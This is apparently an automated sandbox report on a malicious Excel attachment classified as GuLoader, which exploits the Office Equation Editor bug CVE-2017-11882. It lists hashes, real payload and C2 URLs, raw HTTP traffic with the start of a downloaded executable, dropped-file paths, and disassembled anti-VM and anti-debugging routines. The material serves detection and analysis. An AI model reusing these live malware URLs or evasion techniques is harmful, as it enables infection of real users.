Windows Analysis Report Exhibitions Order Detailed list.xlsx

Overview

General Information

Sample Name:	Exhibitions Order Detailed list.xlsx
Analysis ID:	457915
MD5:	c8e623590aae92259642c8c80f761493
SHA1:	877da933e035b90f881d2c7ef3fa37f9065b6aa7
SHA256:	257645cd8e215cd4f9c2c153f3605e7389a2aed04a870a1aa0b4a4d9aa5762b3
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://198.12.91.134/win/vbc.exe

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUu"}

Multi AV Scanner detection for domain / URL

Source: http://198.12.91.134/win/vbc.exe

Virustotal: Detection: 17%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 21%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 10%
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 21%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 10%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_PRUu

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 02 Aug 2021 12:50:18 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Mon, 02 Aug 2021 10:45:08 GMTETag: "1c000-5c891434c93da"Accept-Ranges: bytesContent-Length: 114688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c3 1c 80 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 40 01 00 00 80 00 00 00 00 00 00 44 11 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 01 00 00 10 00 00 e1 60 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 4b 01 00 28 00 00 00 00 70 01 00 96 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 3d 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 5c 11 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 96 5b 00 00 00 70 01 00 00 60 00 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 198.12.91.134 198.12.91.134

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /win/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.134Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC2566A.emf

Jump to behavior

Source: global traffic

Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: BEC2566A.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5968 NtAllocateVirtualMemory,		6_2_003B5968
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A62 NtAllocateVirtualMemory,		6_2_003B5A62

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5968	6_2_003B5968
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B40B7	6_2_003B40B7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0211	6_2_003B0211
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4339	6_2_003B4339
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B443A	6_2_003B443A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B94D8	6_2_003B94D8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B853B	6_2_003B853B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B05A1	6_2_003B05A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B85E7	6_2_003B85E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B95C6	6_2_003B95C6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B86F4	6_2_003B86F4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B86DB	6_2_003B86DB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5781	6_2_003B5781
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8802	6_2_003B8802
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2873	6_2_003B2873
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B891F	6_2_003B891F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1900	6_2_003B1900
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7A7A	6_2_003B7A7A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2A77	6_2_003B2A77
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A62	6_2_003B5A62
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0B59	6_2_003B0B59
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3BFF	6_2_003B3BFF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0BDC	6_2_003B0BDC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8C2C	6_2_003B8C2C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0CFA	6_2_003B0CFA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3CF2	6_2_003B3CF2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3CEF	6_2_003B3CEF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2D3B	6_2_003B2D3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5D78	6_2_003B5D78
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4DB6	6_2_003B4DB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1DA0	6_2_003B1DA0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0DD5	6_2_003B0DD5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7E5C	6_2_003B7E5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1E99	6_2_003B1E99
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0ED2	6_2_003B0ED2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2FD3	6_2_003B2FD3

PE file contains strange resources

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/19@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Exhibitions Order Detailed list.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD539.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Exhibitions Order Detailed list.xlsx

Static file information: File size 1239040 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408873 push esp; ret	6_2_00408877
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004088C0 push esp; ret	6_2_004088CB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004014E9 push es; ret	6_2_004014EA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408CB2 push esi; ret	6_2_00408CB3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040891C push esi; retf	6_2_0040892F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407D36 pushad ; iretd	6_2_00407D3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408672 push esi; ret	6_2_00408677
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407E22 push ds; iretd	6_2_00407E27
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408624 push esp; ret	6_2_00408627
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408ADE push esi; retf	6_2_00408ADF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408695 push esi; ret	6_2_00408677
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B6625 push ebp; iretd	6_2_003B6637

Source: initial sample	Static PE information: section name: .text entropy: 7.07266809617
Source: initial sample	Static PE information: section name: .text entropy: 7.07266809617

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0B59	6_2_003B0B59
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0BDC	6_2_003B0BDC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0CFA	6_2_003B0CFA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2D3B	6_2_003B2D3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0DD5	6_2_003B0DD5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2FD3	6_2_003B2FD3

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B0298 second address: 00000000003B0298 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B7EAD second address: 00000000003B7EAD instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B9858 second address: 00000000003B9858 instructions:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B0298 second address: 00000000003B0298 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B7EAD second address: 00000000003B7EAD instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B9858 second address: 00000000003B9858 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B7CB5 second address: 00000000003B7CB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 8D6257E7h 0x00000007 xor eax, D6E50CE5h 0x0000000c xor eax, CD304DCCh 0x00000011 add eax, 6948E933h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F1684EA0E03h 0x0000001e lfence 0x00000021 mov edx, 617AD252h 0x00000026 xor edx, 84973C64h 0x0000002c xor edx, 903C3D1Eh 0x00000032 xor edx, 0A2FD33Ch 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp edx, 53D52FB7h 0x00000043 cmp ah, ch 0x00000045 test cl, bl 0x00000047 ret 0x00000048 jmp 00007F1684EA0DF9h 0x0000004d cmp ch, dh 0x0000004f sub edx, esi 0x00000051 ret 0x00000052 add edi, edx 0x00000054 dec dword ptr [ebp+000000F8h] 0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000061 jne 00007F1684EA0CFCh 0x00000063 call 00007F1684EA0D57h 0x00000068 call 00007F1684EA0E24h 0x0000006d lfence 0x00000070 mov edx, 617AD252h 0x00000075 xor edx, 84973C64h 0x0000007b xor edx, 903C3D1Eh 0x00000081 xor edx, 0A2FD33Ch 0x00000087 mov edx, dword ptr [edx] 0x00000089 lfence 0x0000008c cmp edx, 53D52FB7h 0x00000092 cmp ah, ch 0x00000094 test cl, bl 0x00000096 ret 0x00000097 mov esi, edx 0x00000099 pushad 0x0000009a rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003B40B7 rdtsc

6_2_003B40B7

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1748

Thread sleep time: -240000s >= -30000s

Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003B40B7 rdtsc

6_2_003B40B7

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B73B4 mov eax, dword ptr fs:[00000030h]	6_2_003B73B4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3441 mov eax, dword ptr fs:[00000030h]	6_2_003B3441
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B853B mov eax, dword ptr fs:[00000030h]	6_2_003B853B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5589 mov eax, dword ptr fs:[00000030h]	6_2_003B5589
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7898 mov eax, dword ptr fs:[00000030h]	6_2_003B7898
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2D3B mov eax, dword ptr fs:[00000030h]	6_2_003B2D3B

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2350876912.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
